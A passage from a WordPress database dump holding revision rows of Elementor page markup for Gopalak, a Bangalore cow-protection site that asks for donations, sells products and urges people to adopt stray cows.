src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by <a href=\"https://themehunk.com/\" target=\"_blank\" rel=\"noopener\">Themehunk</a></p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 12:07:35','2022-10-28 06:37:35','',1373,'https://gopalak.in/?p=2016',0,'revision','',0),(2017,1,'2022-10-28 12:30:52','2022-10-28 07:00:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-28 12:30:52','2022-10-28 07:00:52','',1816,'https://gopalak.in/?p=2017',0,'revision','',0),(2018,1,'2022-10-28 12:30:52','2022-10-28 07:00:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon 